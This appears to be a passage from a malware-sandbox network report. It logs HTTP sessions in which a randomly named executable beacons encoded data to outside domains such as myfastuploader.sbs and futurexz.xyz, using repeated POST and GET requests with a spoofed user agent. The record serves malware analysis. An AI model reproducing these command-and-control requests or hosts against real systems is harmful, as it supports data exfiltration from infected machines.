Kd=Q1qeHTFLcp4Qqrys4lQmFM72i85tZ6KdiB/W9NC1ZaKOurAPm5D11do4jeaHw/6zUi6Y6Qlylm4U/p7LpUKdhudJxyJnwdgTDfN8sHwd+j069FwAZ961giuibn8xZrjkMJeST+2RdXCmkReSxuBnqqtzuMnvflA5FCnYVidCJ0uZua8yjLf6tXO5+7Q001Jm+pUFOGsnJkEjh53Y1Vmdv5gwk1C6k9/OvmNmtnKsCGU2LOcaHbUgvdR6xLdTqhmpUtF89b0ORD1/NGX2Ktg8WdT2lSGsNGAI3jeQ8cEjV9C9PimgsFwHWSJZcg6h0YZMFKx73hH9H1rsm+/It8LJxGxz96cGoW7GNK1nmLBoTr6ywjropWu28Wo24ElKO1v0guHXxYPqmdXvjp0+8MT+8vKqpqdQZgYWkEJrvY1ad6D+QcDh86NIv5nBFYlQ21CjBz8fi8HcCCSj2ulEPSO7NqKAlOqlBsG/pDPqg7RJJFGU1mBYpYYZMvuHUbuFedNG0V4TSn/10xWY+vajzIISd9LV9trxIdWRT1fGRNElF3W7XwLetSdIyGF4tbJc4Iilyv9LWGQ5UCXHJ7R70nVcGKfYxeW8UZd5oSbHNZpRur2C/bpL9s3NzWFjDCpceGdedeVEwP5VLu8FMP7ociHkSj6y8qO9W6Ib94pwsQYy2WsRbSpMLd4FNsNC4IhTZRhncxKGyjYRy3SAagThNQP771CF393TkS3lUrF+cN4UK89bKb2tvNWZHO8BwOBtw7HHTfGpcw87jGWlRDOxTZ3fL1oblA4xyCsqm28KPjXdpFPyncZFD5nnHDmFk7C6pxUlG6UkiMjHqv0RkURwwdmUAyBKUUWAp9gFSi8SaR5psn0dlMEb3OWkT9leaeKnEJkvGo+NshijclsUh47jtgRvXQ+H6r3BFqsurjly2B/LsK24t3ZCyCodJzv1JTCWiQwDO3NrkmLCdxsAv1UR70s/Sxanu/+9v23czJjOim2tWQOKsfobu [TRUNCATED]
Jan 11, 2025 05:43:47.262698889 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:43:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49992	209.74.79.40	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:49.219041109 CET	535	OUT	GET /bhaz/?Kd=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sqJtunC4ShtoFe9xqgD8f0kMZq1MCRe7r1Di4X0JZPZm+NQ==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.futurexz.xyz User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:43:49.812041044 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:43:49 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49993	136.243.225.5	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:54.926264048 CET	809	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 6f 56 41 53 41 4a 61 66 41 43 68 43 6a 65 6d 4a 77 50 4d 73 63 6f 6f 66 44 49 4d 41 54 66 5a 30 72 6d 47 56 4d 4a 69 75 61 70 34 4e 4d 73 31 53 33 4c 33 54 46 52 4d 68 66 70 4d 4c 75 43 58 4f 44 50 50 61 4b 39 37 52 35 6b 4a 59 4b 74 5a 53 37 4f 7a 2f 72 4a 30 4b 45 39 69 4a 31 47 76 59 70 63 43 32 62 2f 44 32 38 62 2f 52 67 65 45 54 79 65 4a 6f 4e 56 51 33 57 46 51 79 47 6c 48 49 34 30 6a 4c 51 47 45 6a 42 43 4c 57 2b 30 54 61 37 55 68 50 7a 71 51 66 49 65 54 68 48 63 76 63 36 6c 36 57 56 4d 6a 75 59 54 2b 41 61 36 37 64 54 75 56 62 49 54 5a 6b 2b 7a 67 3d Data Ascii: Kd=uDlCYg0EzLtUoVASAJafAChCjemJwPMscoofDIMATfZ0rmGVMJiuap4NMs1S3L3TFRMhfpMLuCXODPPaK97R5kJYKtZS7Oz/rJ0KE9iJ1GvYpcC2b/D28b/RgeETyeJoNVQ3WFQyGlHI40jLQGEjBCLW+0Ta7UhPzqQfIeThHcvc6l6WVMjuYT+Aa67dTuVbITZk+zg=
Jan 11, 2025 05:43:55.554913998 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:43:52 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49994	136.243.225.5	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:57.477269888 CET	829	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 36 6c 51 53 51 65 75 66 52 69 68 4e 6d 65 6d 4a 2b 76 4d 67 63 6f 30 66 44 4e 73 71 54 74 4e 30 71 44 36 56 4e 4e 57 75 64 70 34 4e 59 38 31 54 36 72 33 49 46 52 49 58 66 72 6f 4c 75 43 7a 4f 44 4c 4c 61 4a 4b 50 53 35 30 4a 67 47 4e 5a 55 31 75 7a 2f 72 4a 30 4b 45 39 6d 76 31 47 33 59 70 50 61 32 61 64 72 31 69 4c 2f 51 33 75 45 54 34 2b 49 68 4e 56 51 56 57 45 39 6c 47 6a 4c 49 34 32 4c 4c 52 58 45 67 4c 43 4c 55 39 45 53 74 72 58 34 41 36 4a 41 72 44 34 62 6f 54 50 76 34 32 7a 4c 38 50 75 72 47 4c 7a 53 34 4b 70 7a 71 43 65 30 79 53 77 4a 55 67 6b 30 53 63 65 33 49 44 61 41 78 6c 38 36 32 4a 73 74 67 66 79 62 46 Data Ascii: Kd=uDlCYg0EzLtU6lQSQeufRihNmemJ+vMgco0fDNsqTtN0qD6VNNWudp4NY81T6r3IFRIXfroLuCzODLLaJKPS50JgGNZU1uz/rJ0KE9mv1G3YpPa2adr1iL/Q3uET4+IhNVQVWE9lGjLI42LLRXEgLCLU9EStrX4A6JArD4boTPv42zL8PurGLzS4KpzqCe0ySwJUgk0Sce3IDaAxl862JstgfybF
Jan 11, 2025 05:43:58.108350039 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:43:54 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49995	136.243.225.5	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:00.021783113 CET	1846	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 36 6c 51 53 51 65 75 66 52 69 68 4e 6d 65 6d 4a 2b 76 4d 67 63 6f 30 66 44 4e 73 71 54 73 31 30 72 32 32 56 4d 73 57 75 63 70 34 4e 45 4d 31 65 36 72 32 4b 46 56 63 4c 66 72 6b 62 75 45 33 4f 44 6f 44 61 4d 37 50 53 32 30 4a 67 4f 74 5a 52 37 4f 79 69 72 50 55 4f 45 39 32 76 31 47 33 59 70 49 69 32 54 76 44 31 67 4c 2f 52 67 65 45 48 79 65 4a 45 4e 56 6f 76 57 45 4a 31 42 54 72 49 35 57 62 4c 57 6c 63 67 44 43 4c 53 34 45 53 31 72 58 46 41 36 4a 64 55 44 34 47 31 54 50 58 34 7a 46 47 42 65 36 33 51 56 43 61 73 50 5a 37 76 62 72 45 63 59 42 42 42 71 6b 59 55 62 65 6e 30 44 76 51 71 6e 39 48 54 55 49 42 41 57 32 4b 51 54 49 49 73 54 6c 36 35 6f 6a 6c 54 66 50 37 64 36 33 78 54 49 77 79 4a 6f 49 49 46 6b 42 69 33 65 34 2f 38 30 53 2f 36 75 51 74 56 41 50 38 70 68 6b 76 52 68 78 5a 53 30 46 43 43 52 5a 6f 33 34 52 30 41 43 79 56 4e 46 64 6d 72 74 36 34 37 70 35 72 68 52 43 74 61 59 66 61 4e 7a 59 48 55 43 4e 70 36 43 45 67 71 6a 55 69 69 41 6c 42 57 44 30 6f [TRUNCATED] Data Ascii: Kd=uDlCYg0EzLtU6lQSQeufRihNmemJ+vMgco0fDNsqTs10r22VMsWucp4NEM1e6r2KFVcLfrkbuE3ODoDaM7PS20JgOtZR7OyirPUOE92v1G3YpIi2TvD1gL/RgeEHyeJENVovWEJ1BTrI5WbLWlcgDCLS4ES1rXFA6JdUD4G1TPX4zFGBe63QVCasPZ7vbrEcYBBBqkYUben0DvQqn9HTUIBAW2KQTIIsTl65ojlTfP7d63xTIwyJoIIFkBi3e4/80S/6uQtVAP8phkvRhxZS0FCCRZo34R0ACyVNFdmrt647p5rhRCtaYfaNzYHUCNp6CEgqjUiiAlBWD0oEUOvUh/Byd8tCMl+ONdeldVKuvR6C3dQdZ2tyB4X5XFG7WyIU+ad1jPU7omkQIsqtOJj127OCF74o84IavwIIyUBbHMjBg/2cxcgwpLG+RyIAZUN6DFoNnK9Wms0fD4ELH9iSq+NO73o2GZVSK0zBSYOImurRf0iIRTPZNM/7FRWk4mcZZ3u0T0N4mn2phMEDB7TKuSzMrv5H8gvqH/A69UwoTzfy1AYL4qwb8f4XW/h49bZg6WWGs/1XkrDjHreJpPfQlstKz0xBsY3WinbnXYCQ8u+LaJ8Tzr6XdA7fBpkaR3OVuqoobM0n/kGogqPxd/fmLsbENDUwGcXV8DM0FFhYyQcoTifIbshv95upfIsvzW3ZJh5yc2zQSeNxBsUjEMLaLV4RF+3Istg3sAUtCYLEr6WWGzWC84yONomZvBAa7iTtTfduxh64/wcw8TXqpfhYV+xFHKJ6aOuPhGfZWbjf7zzYpSXXUdXzylOn9UIfbZfee5i6+mjtND85rsG/D3qv/36RKMhzKruURaWPkDSXcfwEm5369dz5C+HCP+Ch84OiI9gQGKbS/KyDWoUi6y/dUqT+n98px1VzugJ0pBHWqJ0emUexn50qo+RN6ig7b39o1QcJaWCz+cAyR4pNY43+JnMaZIOywfH52a8XBF8DPOdllKPz1 [TRUNCATED]
Jan 11, 2025 05:44:00.651266098 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:43:57 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49996	136.243.225.5	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:02.563601017 CET	541	OUT	GET /wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32yXtCW6Qn2OjKpMQhR5ymoCju+M+4ZuS09qSIsL0S7/Eveg==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.myfastuploader.sbs User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:44:03.199310064 CET	1039	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:43:59 GMT location: https://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32yXtCW6Qn2OjKpMQhR5ymoCju+M+4ZuS09qSIsL0S7/Eveg==&Gr=hRRPf2Bx Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49997	185.68.108.243	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:08.449371099 CET	803	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 6a 79 69 54 6e 69 37 38 38 64 73 70 63 65 61 6a 42 70 36 39 7a 71 5a 75 5a 58 57 7a 53 33 79 59 72 30 69 72 72 50 31 71 71 35 39 30 4b 4f 4a 68 47 71 57 6e 66 71 6f 63 35 33 52 36 7a 41 79 33 30 39 34 4a 47 31 76 75 2b 53 67 72 63 71 36 37 30 63 6b 49 4d 59 34 69 47 75 55 33 6f 73 58 79 4f 67 2b 53 76 50 67 35 59 72 6c 39 49 70 35 46 63 48 6f 34 63 6d 46 6e 67 71 68 64 56 4a 36 6e 46 2b 77 52 32 73 4e 72 37 36 77 42 68 6a 79 6e 39 72 49 45 32 78 7a 30 39 61 78 6e 65 50 74 39 4e 50 35 58 34 48 4a 6a 6b 48 48 77 64 4b 43 74 76 48 57 55 70 33 66 54 39 77 3d Data Ascii: 